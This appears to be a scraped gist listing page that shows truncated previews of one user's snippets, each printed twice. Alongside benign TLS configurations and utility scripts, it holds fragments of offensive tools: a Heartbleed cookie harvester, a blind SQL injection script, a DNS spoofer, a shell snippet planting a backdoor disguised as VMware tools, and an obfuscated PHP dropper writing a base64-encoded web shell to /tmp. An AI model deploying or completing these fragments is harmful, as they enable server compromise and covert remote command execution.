Scott Behrens sbehrens

## heartbleed-altered.py
#!/usr/bin/python

# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions.
# Michael Davis (mike.philip.davis@gmail.com)

# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)

# The author disclaims copyright to this source code.

import select

## url-to-image.js
// PhantomJS script
// Takes screeshot of a given page. This correctly handles pages which
// dynamically load content making AJAX requests.

// Instead of waiting fixed amount of time before rendering, we give a short
// time for the page to make additional requests.

var _ = require('./lodash.js');


## runner.py
import itertools
from sys import exit

any_digits = [1.67, 1.98, 1.98, 4.41, 4.41, 4.41, 4.41, 4.41, 5.44, 36, 36, 36, 36, 36, 36, 36, 36, 100, 100]

for L in range(0, len(any_digits)+1):
  for subset in itertools.combinations(any_digits, L):
    print '%.2f' % sum(subset)
    if '%.2f' % sum(subset) == 241.40:
        print 'found it!'

## Apache.conf
<VirtualHost *:443>
    SSLEngine on
    SSLCertificateFile      /path/to/signed_certificate
    SSLCertificateChainFile /path/to/intermediate_certificate
    SSLCertificateKeyFile   /path/to/private/key
    SSLCACertificateFile    /path/to/all_ca_certs

    # modern configuration, tweak to your needs
    SSLProtocol             all -SSLv2 -SSLv3 -TLSv1
    SSLCipherSuite          ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-DSS-AES128-GCM-SHA256:kEDH+AESGCM:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA256:DHE-RSA-AES256-SHA256:DHE-DSS-AES256-SHA:DHE-RSA-AES256-SHA:!aNULL:!eNULL:!EXPORT:!DES:!RC4:!3DES:!MD5:!PSK

## nginx.conf
server {
    listen 443 ssl;

    # certs sent to the client in SERVER HELLO are concatenated in ssl_certificate
    ssl_certificate /path/to/signed_cert_plus_intermediates;
    ssl_certificate_key /path/to/private_key;
    ssl_session_timeout 5m;
    ssl_session_cache shared:SSL:50m;

    # Diffie-Hellman parameter for DHE ciphersuites, recommended 2048 bits

## sql.py
##NOT FINISHED##
## ©mastahyeti 2011##
import urllib2
import urllib
import time
import math

CHARSET = [chr(x) for x in xrange(32,39)] + [chr(x) for x in xrange(40,127)] #everything but '
CHARSET_LEN = len(CHARSET)

## vmware bdoor
# vmware backdoor if the dir don’t exist (which it should) create it anyway

mkdir -p /usr/lib/vmware-tools/bin32
vmwarestamp="`ls -l /usr/bin/lsof 2>log.error | awk {'print $6'}`"
echo $vmwarestamp
touch ./vmware-vnet1
chmod 755 ./vmware-vnet1

read -d '' vmware <<"BLOCK"
#!/bin/bash

## gist:2136488
<?PHP

$b = 'bas'.'e64'.'_de'.'code';

file_put_contents('/tmp/asd', $b('P D 9 Q S F A K Z n V u Y 3 R p b 2 4 g b G x l a H M o J G N t Z C w g J G F y c m F 5 I D 0 g d H J 1 Z S l 7 C i A g I C B p Z i A o I W V t c H R 5 K C R j b W Q p K X s K I C A g I C A g I C B p Z i A o Y G V j a G 8 g Y W A p e y A k c 2 F s a W R h W 1 0 9 K G A k Y 2 1 k Y C k 7 I C R z Y W x p Z G F b X T 0 n T W 9 k b z o g Y C R j b W R g J z t 9 C i A g I C A g I C A g C i A g I C A g I C A g Z W x z Z W l m I C h z a G V s b H B v c G V u K C d l Y 2 h v I G E n K S l 7 J H N h b G l k Y V t d P X N o Z W x s c G 9 w Z W 4 o J G N t Z C k 7 I C R z Y W x p Z G F b X T 0 n T W 9 k b z o g c G 9 w Z W 4 o J G N t Z C k n O 3 0 K I C A g I C A g I C A K I C A g I C A g I C B l b H N l a W Y g K H N o Z W x s X 2 V 4 Z W M o J 2 V j a G 8 g Y S c p K X s k c 2 F s a W R h W 1 0 9 c 2 h l b G x f Z X h l Y y g k Y 2 1 k K T s g J H N h b G l k Y V t d P S d N b 2 R v O i B z a G V s b F 9 l e G V j K C R j b W Q p J z t 9 C i A g

## fakedns.py
# File:  fakedns.py
# Name:  Interactive CLI DNS Spoofer
# by:    @mastahyeti
#
# based off of http://code.activestate.com/recipes/491264/

from __future__ import print_function
from gevent.event import Event
from gevent.pool import Pool
from gevent import socket

## gist:3191851
CON

  _clkmode = xtal1 + pll16x
  _xinfreq = 5_000_000


VAR
  long foodude
  long datatown
  byte hello
	#!/usr/bin/python

	# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions.
	# Michael Davis (mike.philip.davis@gmail.com)

	# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)

	# The author disclaims copyright to this source code.

	import select
	// PhantomJS script
	// Takes screeshot of a given page. This correctly handles pages which
	// dynamically load content making AJAX requests.

	// Instead of waiting fixed amount of time before rendering, we give a short
	// time for the page to make additional requests.

	var _ = require('./lodash.js');
	import itertools
	from sys import exit

	any_digits = [1.67, 1.98, 1.98, 4.41, 4.41, 4.41, 4.41, 4.41, 5.44, 36, 36, 36, 36, 36, 36, 36, 36, 100, 100]

	for L in range(0, len(any_digits)+1):
	for subset in itertools.combinations(any_digits, L):
	print '%.2f' % sum(subset)
	if '%.2f' % sum(subset) == 241.40:
	print 'found it!'
	<VirtualHost *:443>
	SSLEngine on
	SSLCertificateFile /path/to/signed_certificate
	SSLCertificateChainFile /path/to/intermediate_certificate
	SSLCertificateKeyFile /path/to/private/key
	SSLCACertificateFile /path/to/all_ca_certs

	# modern configuration, tweak to your needs
	SSLProtocol all -SSLv2 -SSLv3 -TLSv1
	SSLCipherSuite ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-DSS-AES128-GCM-SHA256:kEDH+AESGCM:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA256:DHE-RSA-AES256-SHA256:DHE-DSS-AES256-SHA:DHE-RSA-AES256-SHA:!aNULL:!eNULL:!EXPORT:!DES:!RC4:!3DES:!MD5:!PSK
	server {
	listen 443 ssl;

	# certs sent to the client in SERVER HELLO are concatenated in ssl_certificate
	ssl_certificate /path/to/signed_cert_plus_intermediates;
	ssl_certificate_key /path/to/private_key;
	ssl_session_timeout 5m;
	ssl_session_cache shared:SSL:50m;

	# Diffie-Hellman parameter for DHE ciphersuites, recommended 2048 bits
	##NOT FINISHED##
	## ©mastahyeti 2011##
	import urllib2
	import urllib
	import time
	import math

	CHARSET = [chr(x) for x in xrange(32,39)] + [chr(x) for x in xrange(40,127)] #everything but '
	CHARSET_LEN = len(CHARSET)
	# vmware backdoor if the dir don’t exist (which it should) create it anyway

	mkdir -p /usr/lib/vmware-tools/bin32
	vmwarestamp="`ls -l /usr/bin/lsof 2>log.error \| awk {'print $6'}`"
	echo $vmwarestamp
	touch ./vmware-vnet1
	chmod 755 ./vmware-vnet1

	read -d '' vmware <<"BLOCK"
	#!/bin/bash
	<?PHP

	$b = 'bas'.'e64'.'_de'.'code';

	file_put_contents('/tmp/asd', $b('P D 9 Q S F A K Z n V u Y 3 R p b 2 4 g b G x l a H M o J G N t Z C w g J G F y c m F 5 I D 0 g d H J 1 Z S l 7 C i A g I C B p Z i A o I W V t c H R 5 K C R j b W Q p K X s K I C A g I C A g I C B p Z i A o Y G V j a G 8 g Y W A p e y A k c 2 F s a W R h W 1 0 9 K G A k Y 2 1 k Y C k 7 I C R z Y W x p Z G F b X T 0 n T W 9 k b z o g Y C R j b W R g J z t 9 C i A g I C A g I C A g C i A g I C A g I C A g Z W x z Z W l m I C h z a G V s b H B v c G V u K C d l Y 2 h v I G E n K S l 7 J H N h b G l k Y V t d P X N o Z W x s c G 9 w Z W 4 o J G N t Z C k 7 I C R z Y W x p Z G F b X T 0 n T W 9 k b z o g c G 9 w Z W 4 o J G N t Z C k n O 3 0 K I C A g I C A g I C A K I C A g I C A g I C B l b H N l a W Y g K H N o Z W x s X 2 V 4 Z W M o J 2 V j a G 8 g Y S c p K X s k c 2 F s a W R h W 1 0 9 c 2 h l b G x f Z X h l Y y g k Y 2 1 k K T s g J H N h b G l k Y V t d P S d N b 2 R v O i B z a G V s b F 9 l e G V j K C R j b W Q p J z t 9 C i A g
	# File: fakedns.py
	# Name: Interactive CLI DNS Spoofer
	# by: @mastahyeti
	#
	# based off of http://code.activestate.com/recipes/491264/

	from __future__ import print_function
	from gevent.event import Event
	from gevent.pool import Pool
	from gevent import socket
	CON

	_clkmode = xtal1 + pll16x
	_xinfreq = 5_000_000


	VAR
	long foodude
	long datatown
	byte hello